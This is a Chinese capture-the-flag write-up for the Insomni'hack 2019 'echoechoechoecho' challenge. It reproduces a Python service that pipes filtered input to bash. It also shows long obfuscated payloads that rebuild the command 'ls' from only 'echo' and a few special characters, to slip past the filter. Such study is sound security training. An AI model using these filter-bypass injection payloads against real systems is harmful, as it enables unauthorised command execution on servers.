Insomni'hack teaser 2019 - Misc - echoechoechoecho
参考链接
题目内容
Echo echo echo echo, good luck
nc 35.246.181.187 1337
解题过程
主要思路是通过精巧的构造绕过过滤。
源代码如下:
#!/usr/bin/env python3
from os import close
from random import choice
import re
from signal import alarm
from subprocess import check_output
from termcolor import colored
alarm(10)
colors = ["red","blue","green","yellow","magenta","cyan","white"]
# thanks http://patorjk.com/software/taag/#p=display&h=0&f=Crazy&t=echo
banner = """
_..._ .-'''-.
.-'_..._''. ' _ \\
__.....__ .' .' '.\ . / /` '. \\
.-'' '. / .' .'| . | \ '
/ .-''"'-. `. . ' < | | ' | '
/ /________\ \| | | | \ \ / /
| || | | | .'''-.`. ` ..' /
\ .-------------'. ' | |/.'''. \ '-...-'`
\ '-.____...---. \ '. .| / | |
`. .' '. `._____.-'/| | | |
`''-...... -' `-.______ / | | | |
` | '. | '.
'---' '---'
"""
def bye(s=""):
print(s)
print("bye")
exit()
def check_input(payload):
if payload == 'thisfile':
bye(open("/bin/shell").read())
if not all(ord(c) < 128 for c in payload):
bye("ERROR ascii only pls")
if re.search(r'[^();+$\\= \']', payload.replace("echo", "")):
bye("ERROR invalid characters")
# real echolords probably wont need more special characters than this
if payload.count("+") > 1 or \
payload.count("'") > 1 or \
payload.count(")") > 1 or \
payload.count("(") > 1 or \
payload.count("=") > 2 or \
payload.count(";") > 3 or \
payload.count(" ") > 30:
bye("ERROR Too many special chars.")
return payload
print(colored(banner, choice(colors)))
print("Hi, what would you like to echo today? (make sure to try 'thisfile')")
payload = check_input(input())
print("And how often would you like me to echo that?")
count = max(min(int(input()), 10), 0)
payload += "|bash"*count
close(0)
result = check_output(payload, shell=True, executable="/bin/bash")
bye(result.decode())
Payload只能包含部分特殊符号加上echo, 并且有些特殊符号的使用次数有限制。
下面先演示下如何构造ls
ls | bash
等价于下面
echo $'\154\163' | bash
等价于下面
echo echo \$\'\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))+$((10==10))))\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))))\'
等价于下面。做这道题的时候$$的值为10。
echoecho=\; echoechoecho=\( echoechoechoecho=\) echoechoechoechoecho=\+ echoechoechoechoechoecho=\'; echo echo echo \\$\\$echoechoechoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\$echoechoechoechoechoecho
等价于下面
echo=\=;echo echoecho$echo\\\; echoechoecho$echo\\\( echoechoechoecho$echo\\\) echoechoechoechoecho$echo\\\+ echoechoechoechoechoecho$echo\\\'\; echo echo echo \\\\$\\\\\$echoechoechoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\$echoechoechoechoechoecho
Insomni'hack teaser 2019 - Misc - echoechoechoecho的更多相关文章
- Insomni'hack teaser 2019 - Misc - curlpipebash
参考链接 https://ctftime.org/task/7454 题目 Welcome to Insomni'hack teaser 2019! Execute this Bash command ...
- Insomni'hack teaser 2019 - Pwn - 1118daysober
参考链接 https://ctftime.org/task/7459 Linux内核访问用户空间文件:get_fs()/set_fs()的使用 漏洞的patch信息 https://maltekrau ...
- Insomni'hack teaser 2019 - Reverse - beginner_reverse
参考链接 https://ctftime.org/task/7455 题目描述 A babyrust to become a hardcore reverser 点我下载 解题过程 一道用rust写的 ...
- Insomni’hack CTF-l33t-hoster复现分析
题目地址: https://github.com/eboda/insomnihack/tree/master/l33t_hoster 源码如下: <?php if (isset($_GET[&q ...
- CTF各种资源:题目、工具、资料
目录 题目汇总 Reverse 签到题 Web Web中等难度 Crypto 基础网站 各类工具 综合 Web Payloads 逆向 Pwn 取证 题目汇总 这里收集了我做过的CTF题目 Rever ...
- Kangax 的 ES7 兼容性表格
Kangax 的 ES7 兼容性表格 https://kangax.github.io/compat-table/es2016plus/ Sort by Engine type ...
- 2019年上海市大学生网络安全大赛两道misc WriteUp
2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...
- 2019强网杯部分misc&web
0x01 前言 前两天菜鸡+x和几个大哥算是正式参加了一次ctf的线上赛,也是第一次参加这种比赛(前一段时间巨佬也给了我们一个西班牙的比赛,不过不算是正式参赛,做题的时候,比赛已经结束了),没想到出师 ...
- Hack The Box Web Pentest 2019
[20 Points] Emdee five for life [by L4mpje] 问题描述: Can you encrypt fast enough? 初始页面,不管怎么样点击Submit都会显 ...
随机推荐
- chrome查看JavaScript的堆栈调用
设置断点之后,查看的时候,注意右侧栏. 在调试按钮下方,有一个watch和call stack,
- leetcode-easy-array-31 three sum
mycode 69.20% class Solution(object): def removeDuplicates(self, nums): """ :type nu ...
- springBoot 动态注入bean(bean的注入时机)
springBoot 动态注入bean(bean的注入时机) 参考博客:https://blog.csdn.net/xcy1193068639/article/details/81517456
- VASP学习笔记--输入输出文件
一.VASP 全称Vienna Ab-initio Simulation Package,是维也纳大学Hafner小组开发的进行电子结构计算和量子力学-分子动力学模拟软件包. 它是目前材料模拟和计算物 ...
- 破解Excel 工作表/薄密码
新建excel 在右上角的ThisWorkbook右键插入模块复制下列CODE. Option Explicit Public Sub AllInternalPasswords()' Breaks w ...
- nginx排查502错误
排查502错误1.查看/usr/local/nginx/conf/nginx.conf从而知道其错误日志在哪.重点查看其错误日志.2.如果是/tmp/dd.sock2017/05/01 18:48:3 ...
- nohup后台运行
1.信息输出 nohup java -jar xxxx.jar & 2.信息不输出 nohup java -jar xxxx.jar >/dev/null 2>&1 &am ...
- JavaWeb项目:Shiro实现简单的权限控制(整合SSM)
该demo整合Shiro的相关配置参考开涛的博客 数据库表格相关设计 表格设计得比较简单,导航栏直接由角色表auth_role的角色描述vRoleDesc(父结点)和角色相关权限中的权限描述(标记为 ...
- laravel 5.6 使用RabbitMQ作为消息中间件
1.Composer安装laravel-queue-rabbitmqcomposer require vladimir-yuldashev/laravel-queue-rabbitmq2.在confi ...
- 应用安全 - 中间件漏洞 - Nostromo
CVE-2011-0751 Date: 2011.3 类型: 路径遍历 PoC:https://nvd.nist.gov/vuln/detail/CVE-2011-0751 CVE-2019-162 ...